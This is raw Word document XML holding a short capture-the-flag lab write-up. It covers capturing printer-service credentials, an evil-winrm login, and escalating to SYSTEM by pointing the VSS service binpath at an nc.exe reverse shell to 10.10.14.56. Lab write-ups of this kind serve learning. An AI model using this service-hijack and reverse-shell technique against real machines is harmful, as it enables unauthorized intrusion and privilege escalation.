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7ABF982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451179">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Return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4FFEB2CB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45291F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this lab, I learnt the perfect way to use get-service tool In shell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E465F25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451179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2B2F37FA" w:rsidR="00843DCE" w:rsidRDefault="007900C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the website where we notice the setting page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C06BD1A" w14:textId="66380FA1" w:rsidR="007900C0" w:rsidRDefault="007900C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just enter our tun0 ip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18FD8DF3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the website we notice we can enter the port so just add 10.10.14.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B62E4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netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DA6D5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 -lvnp 347 = 347 is showcase in website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0629B1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update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633C705A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the password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF2B1A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start evil-winrm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609A637D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whoami /all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE79CBC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user svc-printer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5974A878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services = we don’t obtain anything so just sent the nc.exe to the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FEB11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python3 -m http.server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99E576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upload nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04A421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 -lvnp 9001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63194BAB" w14:textId="77777777" w:rsidR="007900C0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get-service vss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78DC7A" w14:textId="77777777" w:rsidR="007900C0" w:rsidRPr="00843DCE" w:rsidRDefault="007900C0" w:rsidP="007900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sc.exe config vss binpath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.56 9001”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093A6A2F" w:rsidR="00843DCE" w:rsidRDefault="007900C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root.txt in administrator desktop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2D1095"/>
    <w:rsid w:val="003F280B"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00451179"/>
    <w:rsid w:val="0045291F"/>
    <w:rsid w:val="006B5FFB"/>
    <w:rsid w:val="007900C0"/>
    <w:rsid w:val="007A70EB"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00867212"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D5126C"/>
    <w:rsid w:val="00D524BC"/>
    <w:rsid w:val="00D75204"/>
    <w:rsid w:val="00F034DE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0C0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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-24T05:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>